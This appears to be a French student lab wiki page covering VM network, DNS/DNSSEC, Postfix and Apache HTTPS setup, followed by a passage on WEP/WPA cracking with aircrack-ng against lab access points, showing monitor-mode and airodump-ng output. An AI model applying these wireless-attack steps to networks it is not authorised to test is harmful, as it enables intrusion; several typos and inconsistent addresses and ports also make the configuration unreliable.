Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
====Modification de la page d'accueille Apashe2====&lt;br /&gt;
&lt;br /&gt;
Pour éviter d'avoir la page de base Apash2, on va modifier le fichier 'index.html' pour cela il suffit d'éditer le fichier avec vim avec la commande &amp;lt;code&amp;gt;vim /var/www/html/index.html&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Le site : https://www.w3schools.com/html/html_examples.asp explique comment faire sa propre page web.&lt;br /&gt;
la page pour le site 'glopglop.site' ne sert que d'exemple si on veux une page plus élaborer des template sont directement disponible sur le net avec en prime les fichiers css pour obtenir un site vraiment attractif. mais on cherche juste pour le moment a avoir une page différente de test.&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
